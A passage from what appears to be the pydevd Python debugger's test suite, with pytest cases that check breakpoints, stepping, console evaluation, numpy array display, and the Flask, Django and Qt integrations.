'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" qualifier="{0}" value="int%253A 20" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" value="int%253A 20" />%0A', # jython
]
])
writer.write_run_thread(hit.thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_8(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=15)
writer.write_run_thread(hit.thread_id)
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_9(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
# Note: no active exception (should not give an error and should return no
# exception details as there's no exception).
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(CMD_GET_EXCEPTION_DETAILS)
assert msg.thread['id'] == hit.thread_id
assert not hasattr(msg.thread, 'frames') # No frames should be found.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_10(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'None') # None or Method should make hit.
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_11(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'Method1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=3)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO, line=12) # Reverts to step in
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=13)
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO, line=18) # Reverts to step in
assert hit.name == '<module>'
# Finish with a step over
writer.write_step_over(hit.thread_id)
if IS_JYTHON:
# Jython got to the exit functions (CPython does it builtin,
# so we have no traces from Python).
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO) # Reverts to step in
assert hit.name == '_run_exitfuncs'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_12(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, '') # Should not be hit: setting empty function (not None) should only hit global.
writer.write_add_breakpoint(6, 'Method1a')
writer.write_add_breakpoint(11, 'Method2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=11)
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=6) # not a return (it stopped in the other breakpoint)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='Failing on IronPython (needs to be investigated).')
def test_case_13(case_setup):
with case_setup.test_file('_debugger_case13.py') as writer:
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import",
"import __builtin__"):
if expected in line:
return True
return False
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(35, 'main')
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=25)
# Should go inside setter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=21)
# Should go inside getter method
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107')
# Disable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;true;true;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=39)
# Should Skip step into properties setter
# Enable property tracing
writer.write("%s\t%s\t%s" % (CMD_SET_PROPERTY_TRACE, writer.next_seq(), "true;false;false;true"))
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=8)
# Should go inside getter method
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_14(case_setup):
# Interactive Debug Console
with case_setup.test_file('_debugger_case14.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.thread_id, '%s not valid.' % hit.thread_id
assert hit.frame_id, '%s not valid.' % hit.frame_id
# Access some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Black%27'])
        assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
# Change some variable
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color='Red'" % (hit.thread_id, hit.frame_id))
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tcarObj.color" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<more>False</more>', '%27Red%27'])
        assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
# Iterate some loop
writer.write_debug_console_expression("%s\t%s\tEVALUATE\tfor i in range(3):" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t print(i)" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(['<xml><more>True</more></xml>'])
writer.write_debug_console_expression("%s\t%s\tEVALUATE\t" % (hit.thread_id, hit.frame_id))
writer.wait_for_var(
[
'<xml><more>False</more><output message="0"></output><output message="1"></output><output message="2"></output></xml>' ]
)
        assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_15(case_setup):
with case_setup.test_file('_debugger_case15.py') as writer:
writer.write_add_breakpoint(22, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# Access some variable
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXEC", "f=lambda x: 'val=%s' % x", "f")
writer.wait_for_custom_operation('val=Black')
assert 7 == writer._sequence, 'Expected 7. Had: %s' % writer._sequence
writer.write_custom_operation("%s\t%s\tEXPRESSION\tcarObj.color" % (hit.thread_id, hit.frame_id), "EXECFILE", debugger_unittest._get_debugger_test_file('_debugger_case15_execfile.py'), "f")
writer.wait_for_custom_operation('val=Black')
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_16(case_setup):
# numpy.ndarray resolver
try:
import numpy
except ImportError:
pytest.skip('numpy not available')
with case_setup.test_file('_debugger_case16.py') as writer:
writer.write_add_breakpoint(9, 'main')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
# In this test we check that the three arrays of different shapes, sizes and types
# are all resolved properly as ndarrays.
# First pass check is that we have all three expected variables defined
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_multiple_vars((
(
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j 8.%252B1.j%250A 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j 16.%252B1.j 17.%252B1.j%250A 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j 24.%252B1.j 25.%252B1.j 26.%252B1.j%250A 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j%250A 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j%250A 45.%252B1.j 46.%252B1.j 47.%252B1.j 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j%250A 54.%252B1.j 55.%252B1.j 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j%250A 63.%252B1.j 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j 80.%252B1.j%250A 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j 88.%252B1.j 89.%252B1.j%250A 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j 96.%252B1.j 97.%252B1.j 98.%252B1.j%250A 99.%252B1.j%255D" isContainer="True" />',
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j%250A 8.%252B1.j 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j%250A 16.%252B1.j 17.%252B1.j 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j%250A 24.%252B1.j 25.%252B1.j 26.%252B1.j 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j%250A 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j%250A 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j 45.%252B1.j 46.%252B1.j 47.%252B1.j%250A 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j 54.%252B1.j 55.%252B1.j%250A 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j 63.%252B1.j%250A 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j%250A 80.%252B1.j 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j%250A 88.%252B1.j 89.%252B1.j 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j%250A 96.%252B1.j 97.%252B1.j 98.%252B1.j 99.%252B1.j%255D" isContainer="True" />'
),
(
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ... 9997 9998 9999%255D%250A %255B10000 10001 10002 ... 19997 19998 19999%255D%250A %255B20000 20001 20002 ... 29997 29998 29999%255D%250A ...%250A %255B70000 70001 70002 ... 79997 79998 79999%255D%250A %255B80000 80001 80002 ... 89997 89998 89999%255D%250A %255B90000 90001 90002 ... 99997 99998 99999%255D%255D" isContainer="True" />',
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ...%252C 9997 9998 9999%255D%250A %255B10000 10001 10002 ...%252C 19997 19998 19999%255D%250A %255B20000 20001 20002 ...%252C 29997 29998 29999%255D%250A ...%252C %250A %255B70000 70001 70002 ...%252C 79997 79998 79999%255D%250A %255B80000 80001 80002 ...%252C 89997 89998 89999%255D%250A %255B90000 90001 90002 ...%252C 99997 99998 99999%255D%255D" isContainer="True" />'
),
# Any of the ones below will do.
(
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ... 9999997 9999998 9999999%255D" isContainer="True" />',
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ...%252C 9999997 9999998 9999999%255D" isContainer="True" />'
)
))
# For each variable, check each of the resolved (meta data) attributes...
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray')
writer.wait_for_multiple_vars((
'<var name="min" type="complex128"',
'<var name="max" type="complex128"',
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
# ...and check that the internals are resolved properly
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray')
# isContainer could be true on some numpy versions, so, we only check for the var begin.
writer.wait_for_multiple_vars((
[
'<var name="min" type="int64" qualifier="numpy" value="int64%253A 0"',
'<var name="min" type="int64" qualifier="numpy" value="int64%3A 0"',
'<var name="size" type="int" qualifier="{0}" value="int%3A 100000"'.format(builtin_qualifier),
],
[
'<var name="max" type="int64" qualifier="numpy" value="int64%253A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
'<var name="max" type="int64" qualifier="numpy" value="int64%3A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"'
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
# this one is different because it crosses the magic threshold where we don't calculate
# the min/max
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray')
writer.wait_for_var((
[
'<var name="min" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
],
[
'<var name="max" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17(case_setup):
# Check dont trace
with case_setup.test_file('_debugger_case17.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(27, 'main')
writer.write_add_breakpoint(29, 'main')
writer.write_add_breakpoint(31, 'main')
writer.write_add_breakpoint(33, 'main')
writer.write_make_initial_run()
for _i in range(4):
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=2)
# Should Skip step into properties setter
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17a(case_setup):
# Check dont trace return
with case_setup.test_file('_debugger_case17a.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(2, 'm1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=10)
# Should Skip step into properties setter
assert hit.name == 'm3'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_18(case_setup):
# change local variable
if IS_IRONPYTHON or IS_JYTHON:
pytest.skip('Unsupported assign to local')
with case_setup.test_file('_debugger_case18.py') as writer:
writer.write_add_breakpoint(5, 'm2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'a', '40')
writer.wait_for_var('<xml><var name="" type="int" qualifier="{0}" value="int%253A 40" />%0A</xml>'.format(builtin_qualifier,))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_19(case_setup):
# Check evaluate '__' attributes
with case_setup.test_file('_debugger_case19.py') as writer:
writer.write_add_breakpoint(8, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=8)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a.__var')
writer.wait_for_evaluation([
[
'<var name="a.__var" type="int" qualifier="{0}" value="int'.format(builtin_qualifier),
'<var name="a.__var" type="int" value="int', # jython
]
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Monkey-patching related to starting threads not done on Jython.')
def test_case_20(case_setup):
# Check that we were notified of threads creation before they started to run
with case_setup.test_file('_debugger_case20.py') as writer:
writer.write_make_initial_run()
# We already check if it prints 'TEST SUCEEDED' by default, so, nothing
# else should be needed in this test as it tests what's needed just by
# running the module.
writer.finished_ok = True
@pytest.mark.skipif(not TEST_FLASK, reason='No flask available')
def test_case_flask(case_setup_flask):
with case_setup_flask.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint_jinja2(5, None, 'hello.html')
writer.write_add_breakpoint_jinja2(8, None, 'hello.html')
writer.write_make_initial_run()
t = writer.create_request_thread()
time.sleep(2) # Give flask some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_single_notification_as_hit(line=5)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(line=8)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
assert '<title>Hello</title>' in contents
assert 'Flask-Jinja-Test' in contents
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_a(case_setup_django):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', get_environ=get_environ) as writer:
writer.write_add_breakpoint_django(5, None, 'index.html')
writer.write_make_initial_run()
t = writer.create_request_thread('my_app')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v1'
])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v2'
])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
if contents != '<ul><li>v1:v1</li><li>v2:v2</li></ul>':
raise AssertionError('%s != <ul><li>v1:v1</li><li>v2:v2</li></ul>' % (contents,))
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_b(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_breakpoint_django(4, None, 'name.html')
writer.write_add_exception_breakpoint_django()
writer.write_remove_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/name')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=4)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="form" type="NameForm" qualifier="my_app.forms" value="NameForm%253A')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_template_inherits_no_exception(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/inherits')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''"chat_mode=True""chat_mode=False"'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_var_error(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/no_var_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''no_pat_name'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_no_attribute_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_attribute_exception_breakpoint_and_regular_exceptions(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_exception_breakpoint_django()
# The django plugin has priority over the regular exception breakpoint.
writer.write_add_exception_breakpoint_with_policy(
'django.template.base.VariableDoesNotExist',
notify_on_handled_exceptions=2, # 2 means notify only on first raise.
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_invalid_template_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error2')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=4, file='template_error2.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="token" type="Token" qualifier="django.template.base" value="Token:')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_CYTHON, reason='No cython available')
def test_cython(case_setup):
from _pydevd_bundle import pydevd_cython
assert pydevd_cython.trace_dispatch is not None
def _has_qt():
try:
try:
from PySide import QtCore # @UnresolvedImport
return True
except:
from PySide2 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt4 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt5 import QtCore # @UnresolvedImport
return True
except:
pass
return False
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread1(case_setup):
with case_setup.test_file('_debugger_case_qthread1.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread2(case_setup):
with case_setup.test_file('_debugger_case_qthread2.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'long_running')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread3(case_setup):
with case_setup.test_file('_debugger_case_qthread3.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread4(case_setup):
with case_setup.test_file('_debugger_case_qthread4.py') as writer:
original_additional_output_checks = writer.additional_output_checks
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'On start called' not in stdout:
raise AssertionError('Expected "On start called" to be in stdout:\n%s' % (stdout,))
if 'Done sleeping' not in stdout:
raise AssertionError('Expected "Done sleeping" to be in stdout:\n%s' % (stdout,))
if 'native Qt signal is not callable' in stderr:
raise AssertionError('Did not expect "native Qt signal is not callable" to be in stderr:\n%s' % (stderr,))
breakpoint_id = writer.write_add_breakpoint(28, 'on_start') # breakpoint on print('On start called2').
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
def test_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
